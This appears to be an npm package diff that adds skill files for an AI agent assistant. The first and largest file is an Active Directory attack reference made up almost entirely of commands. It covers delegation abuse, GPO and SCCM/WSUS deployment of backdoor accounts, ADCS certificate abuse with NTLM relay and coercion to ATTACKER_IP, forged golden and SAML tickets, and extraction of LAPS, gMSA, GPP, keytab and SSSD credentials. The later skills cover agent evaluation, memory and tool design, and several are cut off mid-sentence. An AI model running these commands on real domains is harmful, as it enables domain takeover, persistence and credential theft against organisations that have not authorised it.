@namch/agent-assistant 1.0.0 → 1.0.2

package/skills/active-directory-attacks/references/advanced-attacks.md

@@ -0,0 +1,382 @@
+# Advanced Active Directory Attacks Reference
+
+## Table of Contents
+1. [Delegation Attacks](#delegation-attacks)
+2. [Group Policy Object Abuse](#group-policy-object-abuse)
+3. [RODC Attacks](#rodc-attacks)
+4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
+5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
+6. [Trust Relationship Attacks](#trust-relationship-attacks)
+7. [ADFS Golden SAML](#adfs-golden-saml)
+8. [Credential Sources](#credential-sources)
+9. [Linux AD Integration](#linux-ad-integration)
+
+---
+
+## Delegation Attacks
+
+### Unconstrained Delegation
+
+When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
+
+**Find Delegation:**
+```powershell
+# PowerShell
+Get-ADComputer -Filter {TrustedForDelegation -eq $True}
+
+# BloodHound
+MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
+```
+
+**SpoolService Abuse:**
+```bash
+# Check spooler service
+ls \\dc01\pipe\spoolss
+
+# Trigger with SpoolSample
+.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
+
+# Or with printerbug.py
+python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
+```
+
+**Monitor with Rubeus:**
+```powershell
+Rubeus.exe monitor /interval:1
+```
+
+### Constrained Delegation
+
+**Identify:**
+```powershell
+Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
+```
+
+**Exploit with Rubeus:**
+```powershell
+# S4U2 attack
+Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+**Exploit with Impacket:**
+```bash
+getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
+```
+
+### Resource-Based Constrained Delegation (RBCD)
+
+```powershell
+# Create machine account
+New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
+
+# Set delegation
+Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
+
+# Get ticket
+.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+---
+
+## Group Policy Object Abuse
+
+### Find Vulnerable GPOs
+
+```powershell
+Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
+```
+
+### Abuse with SharpGPOAbuse
+
+```powershell
+# Add local admin
+.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add user rights
+.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add immediate task
+.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
+```
+
+### Abuse with pyGPOAbuse (Linux)
+
+```bash
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+```
+
+---
+
+## RODC Attacks
+
+### RODC Golden Ticket
+
+RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
+
+### RODC Key List Attack
+
+**Requirements:**
+- krbtgt credentials of the RODC (-rodcKey)
+- ID of the krbtgt account of the RODC (-rodcNo)
+
+```bash
+# Impacket keylistattack
+keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
+
+# Using secretsdump with keylist
+secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
+```
+
+**Using Rubeus:**
+```powershell
+Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
+```
+
+---
+
+## SCCM/WSUS Deployment
+
+### SCCM Attack with MalSCCM
+
+```bash
+# Locate SCCM server
+MalSCCM.exe locate
+
+# Enumerate targets
+MalSCCM.exe inspect /all
+MalSCCM.exe inspect /computers
+
+# Create target group
+MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
+MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
+
+# Create malicious app
+MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
+
+# Deploy
+MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
+
+# Force checkin
+MalSCCM.exe checkin /groupname:TargetGroup
+
+# Cleanup
+MalSCCM.exe app /cleanup /name:backdoor
+MalSCCM.exe group /delete /groupname:TargetGroup
+```
+
+### SCCM Network Access Accounts
+
+```powershell
+# Find SCCM blob
+Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
+
+# Decrypt with SharpSCCM
+.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
+```
+
+### WSUS Deployment Attack
+
+```bash
+# Using SharpWSUS
+SharpWSUS.exe locate
+SharpWSUS.exe inspect
+
+# Create malicious update
+SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
+
+# Deploy to target
+SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+
+# Check status
+SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
+
+# Cleanup
+SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+```
+
+---
+
+## AD Certificate Services (ADCS)
+
+### ESC1 - Misconfigured Templates
+
+Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
+
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
+
+# Request certificate as admin
+certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
+
+# Authenticate
+certipy auth -pfx administrator.pfx -dc-ip DC_IP
+```
+
+### ESC4 - ACL Vulnerabilities
+
+```python
+# Check for WriteProperty
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
+
+# Add ENROLLEE_SUPPLIES_SUBJECT flag
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+
+# Perform ESC1, then restore
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
+```
+
+### ESC8 - NTLM Relay to Web Enrollment
+
+```bash
+# Start relay
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+
+# Coerce authentication
+python3 petitpotam.py ATTACKER_IP DC_IP
+
+# Use certificate
+Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
+```
+
+### Shadow Credentials
+
+```bash
+# Add Key Credential (pyWhisker)
+python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
+
+# Get TGT with PKINIT
+python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
+
+# Get NT hash
+export KRB5CCNAME=target.ccache
+python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
+```
+
+---
+
+## Trust Relationship Attacks
+
+### Child to Parent Domain (SID History)
+
+```powershell
+# Get Enterprise Admins SID from parent
+$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
+
+# Create Golden Ticket with SID History
+kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
+```
+
+### Forest to Forest (Trust Ticket)
+
+```bash
+# Dump trust key
+lsadump::trust /patch
+
+# Forge inter-realm TGT
+kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
+
+# Use trust ticket
+.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
+```
+
+---
+
+## ADFS Golden SAML
+
+**Requirements:**
+- ADFS service account access
+- Token signing certificate (PFX + decryption password)
+
+```bash
+# Dump with ADFSDump
+.\ADFSDump.exe
+
+# Forge SAML token
+python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
+```
+
+---
+
+## Credential Sources
+
+### LAPS Password
+
+```powershell
+# PowerShell
+Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
+
+# CrackMapExec
+crackmapexec ldap DC_IP -u user -p password -M laps
+```
+
+### GMSA Password
+
+```powershell
+# PowerShell + DSInternals
+$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
+$mp = $gmsa.'msDS-ManagedPassword'
+ConvertFrom-ADManagedPasswordBlob $mp
+```
+
+```bash
+# Linux with bloodyAD
+python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
+```
+
+### Group Policy Preferences (GPP)
+
+```bash
+# Find in SYSVOL
+findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
+
+# Decrypt
+python3 Get-GPPPassword.py -no-pass 'DC_IP'
+```
+
+### DSRM Credentials
+
+```powershell
+# Dump DSRM hash
+Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
+
+# Enable DSRM admin logon
+Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
+```
+
+---
+
+## Linux AD Integration
+
+### CCACHE Ticket Reuse
+
+```bash
+# Find tickets
+ls /tmp/ | grep krb5cc
+
+# Use ticket
+export KRB5CCNAME=/tmp/krb5cc_1000
+```
+
+### Extract from Keytab
+
+```bash
+# List keys
+klist -k /etc/krb5.keytab
+
+# Extract with KeyTabExtract
+python3 keytabextract.py /etc/krb5.keytab
+```
+
+### Extract from SSSD
+
+```bash
+# Database location
+/var/lib/sss/secrets/secrets.ldb
+
+# Key location
+/var/lib/sss/secrets/.secrets.mkey
+
+# Extract
+python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
+```

package/skills/agent-evaluation/SKILL.md

@@ -0,0 +1,64 @@
+---
+name: agent-evaluation
+description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Evaluation
+
+You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
+production. You've learned that evaluating LLM agents is fundamentally different from
+testing traditional software—the same input can produce different outputs, and "correct"
+often has no single answer.
+
+You've built evaluation frameworks that catch issues before production: behavioral regression
+tests, capability assessments, and reliability metrics. You understand that the goal isn't
+100% test pass rate—it
+
+## Capabilities
+
+- agent-testing
+- benchmark-design
+- capability-assessment
+- reliability-metrics
+- regression-testing
+
+## Requirements
+
+- testing-fundamentals
+- llm-fundamentals
+
+## Patterns
+
+### Statistical Test Evaluation
+
+Run tests multiple times and analyze result distributions
+
+### Behavioral Contract Testing
+
+Define and test agent behavioral invariants
+
+### Adversarial Testing
+
+Actively try to break agent behavior
+
+## Anti-Patterns
+
+### ❌ Single-Run Testing
+
+### ❌ Only Happy Path Tests
+
+### ❌ Output String Matching
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Agent scores well on benchmarks but fails in production | high | // Bridge benchmark and production evaluation |
+| Same test passes sometimes, fails other times | high | // Handle flaky tests in LLM agent evaluation |
+| Agent optimized for metric, not actual task | medium | // Multi-dimensional evaluation to prevent gaming |
+| Test data accidentally used in training or prompts | critical | // Prevent data leakage in agent evaluation |
+
+## Related Skills
+
+Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`

package/skills/agent-memory-mcp/SKILL.md

@@ -0,0 +1,82 @@
+---
+name: agent-memory-mcp
+author: Amit Rathiesh
+description: A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions).
+---
+
+# Agent Memory Skill
+
+This skill provides a persistent, searchable memory bank that automatically syncs with project documentation. It runs as an MCP server to allow reading/writing/searching of long-term memories.
+
+## Prerequisites
+
+- Node.js (v18+)
+
+## Setup
+
+1. **Clone the Repository**:
+   Clone the `agentMemory` project into your agent's workspace or a parallel directory:
+
+   ```bash
+   git clone https://github.com/webzler/agentMemory.git .agent/skills/agent-memory
+   ```
+
+2. **Install Dependencies**:
+
+   ```bash
+   cd .agent/skills/agent-memory
+   npm install
+   npm run compile
+   ```
+
+3. **Start the MCP Server**:
+   Use the helper script to activate the memory bank for your current project:
+
+   ```bash
+   npm run start-server <project_id> <absolute_path_to_target_workspace>
+   ```
+
+   _Example for current directory:_
+
+   ```bash
+   npm run start-server my-project $(pwd)
+   ```
+
+## Capabilities (MCP Tools)
+
+### `memory_search`
+
+Search for memories by query, type, or tags.
+
+- **Args**: `query` (string), `type?` (string), `tags?` (string[])
+- **Usage**: "Find all authentication patterns" -> `memory_search({ query: "authentication", type: "pattern" })`
+
+### `memory_write`
+
+Record new knowledge or decisions.
+
+- **Args**: `key` (string), `type` (string), `content` (string), `tags?` (string[])
+- **Usage**: "Save this architecture decision" -> `memory_write({ key: "auth-v1", type: "decision", content: "..." })`
+
+### `memory_read`
+
+Retrieve specific memory content by key.
+
+- **Args**: `key` (string)
+- **Usage**: "Get the auth design" -> `memory_read({ key: "auth-v1" })`
+
+### `memory_stats`
+
+View analytics on memory usage.
+
+- **Usage**: "Show memory statistics" -> `memory_stats({})`
+
+## Dashboard
+
+This skill includes a standalone dashboard to visualize memory usage.
+
+```bash
+npm run start-dashboard <absolute_path_to_target_workspace>
+```
+
+Access at: `http://localhost:3333`

package/skills/agent-memory-systems/SKILL.md

@@ -0,0 +1,67 @@
+---
+name: agent-memory-systems
+description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them.  Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets.  The field is fragm"
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Memory Systems
+
+You are a cognitive architect who understands that memory makes agents intelligent.
+You've built memory systems for agents handling millions of interactions. You know
+that the hard part isn't storing - it's retrieving the right memory at the right time.
+
+Your core insight: Memory failures look like intelligence failures. When an agent
+"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
+not a storage problem. You obsess over chunking strategies, embedding quality,
+and
+
+## Capabilities
+
+- agent-memory
+- long-term-memory
+- short-term-memory
+- working-memory
+- episodic-memory
+- semantic-memory
+- procedural-memory
+- memory-retrieval
+- memory-formation
+- memory-decay
+
+## Patterns
+
+### Memory Type Architecture
+
+Choosing the right memory type for different information
+
+### Vector Store Selection Pattern
+
+Choosing the right vector database for your use case
+
+### Chunking Strategy Pattern
+
+Breaking documents into retrievable chunks
+
+## Anti-Patterns
+
+### ❌ Store Everything Forever
+
+### ❌ Chunk Without Testing Retrieval
+
+### ❌ Single Memory Type for All Data
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Issue | critical | ## Contextual Chunking (Anthropic's approach) |
+| Issue | high | ## Test different sizes |
+| Issue | high | ## Always filter by metadata first |
+| Issue | high | ## Add temporal scoring |
+| Issue | medium | ## Detect conflicts on storage |
+| Issue | medium | ## Budget tokens for different memory types |
+| Issue | medium | ## Track embedding model in metadata |
+
+## Related Skills
+
+Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`

package/skills/agent-tool-builder/SKILL.md

@@ -0,0 +1,53 @@
+---
+name: agent-tool-builder
+description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary.  This skill covers tool design from schema to error handling. JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools.  Key insight: Tool descriptions are more important than tool implementa"
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Tool Builder
+
+You are an expert in the interface between LLMs and the outside world.
+You've seen tools that work beautifully and tools that cause agents to
+hallucinate, loop, or fail silently. The difference is almost always
+in the design, not the implementation.
+
+Your core insight: The LLM never sees your code. It only sees the schema
+and description. A perfectly implemented tool with a vague description
+will fail. A simple tool with crystal-clear documentation will succeed.
+
+You push for explicit error hand
+
+## Capabilities
+
+- agent-tools
+- function-calling
+- tool-schema-design
+- mcp-tools
+- tool-validation
+- tool-error-handling
+
+## Patterns
+
+### Tool Schema Design
+
+Creating clear, unambiguous JSON Schema for tools
+
+### Tool with Input Examples
+
+Using examples to guide LLM tool usage
+
+### Tool Error Handling
+
+Returning errors that help the LLM recover
+
+## Anti-Patterns
+
+### ❌ Vague Descriptions
+
+### ❌ Silent Failures
+
+### ❌ Too Many Tools
+
+## Related Skills
+
+Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`